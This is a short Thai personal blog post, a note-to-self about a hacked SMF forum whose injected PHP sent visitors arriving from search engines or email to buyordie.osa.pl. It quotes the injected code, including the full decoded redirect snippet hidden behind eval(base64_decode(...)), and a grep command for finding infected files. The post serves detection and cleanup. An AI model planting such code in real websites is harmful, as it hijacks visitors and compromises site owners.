โลกของ "เจ๋ง"

<<
มีนาคม 2554
 12345
6789101112
13141516171819
20212223242526
2728293031 
 
31 มีนาคม 2554
 

เมื่อเปิดเวปจากเมล์ทีไร ทำไมมันต้องเข้า buyordie.pl ทุกที???

เวปโดน hack คราวก่อน มันฝัง Code เอาไว้ ทำให้เวลาเข้าเวปจากอีเมล์มันจะ redirect ไปเวป buyordie.pl ก่อนทุกครั้ง แต่ถ้าเรียกเวปตรงๆ ไม่ยักกะเจอ.. มันก็เก่งเนอะ

หาๆ ไปก็เจอจาก
//forum.ragezone.com/6149126-post1.html

แบบแรก


แบบนี้แหละที่มันเอาไปใส่ smf ไฟล์ index.php เพื่อโหลดทุกครั้งที่มีการกด links มาหาหน้า index.php นี้

แบบสอง
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: //buyordie.osa.pl/");
exit();
}
}

แบบสาม
header("Location: //buyordie.osa.pl/");

ครบเชียว


อีกแหล่งไม่ตรงเท่าไหร่ แต่ก็คล้ายๆ กัน
//www.jorgepablos.com/2011/03/watch-out-php-5-2-vulnerability-google-results-finditnow-osa-pl/

The following grep search in the site’s document root confirmed our worst fears:
1 grep -rl "eval(base64_decode" * <<----- นี่แหละ ที่โดน

About 20 PHP files were found to have this piece of “disguised” code on top:
01 // Original code:
02 eval(base64_decode(DQplcnJvcl9yZX[... more stuff here ...]));
03
04 // When decoded, the lines look like this:
05 error_reporting(0);
06 $nccv=headers_sent();
07 if (!$nccv){
08 $referer=$_SERVER['HTTP_REFERER'];
09 $ua=$_SERVER['HTTP_USER_AGENT'];
10 if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live") or stristr($referer,"facebook")) {
11 if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
12 header("Location: //buyordie.osa.pl/");
13 exit();
14 }
15 }
16 }

Credit all content by all owner (( THANK YOU ))

จบๆ note ไว้กันลืม




 

Create Date : 31 มีนาคม 2554
1 comments
Last Update : 31 มีนาคม 2554 11:12:13 น.
Counter : 675 Pageviews.
Share

 
 
 
 
ขอบคุณที่แบ่งปันความรู้ host
 
 

โดย: hosting (tewtor ) วันที่: 12 เมษายน 2554 เวลา:10:38:32 น.  

Name
Opinion
*ใช้ code html ตกแต่งข้อความได้เฉพาะสมาชิก

dokawa
 
Location :
กรุงเทพ Thailand

[ดู Profile ทั้งหมด]

ฝากข้อความหลังไมค์
Rss Feed
Smember
ผู้ติดตามบล็อก : 1 คน [?]

ความจำสั้น แต่ bloggang.com คงจะอายุยาว เลยเอาความรู้มาฝากไว้หน่อยครับ
[Add dokawa's blog to your web]

 
pantip.com pantipmarket.com pantown.com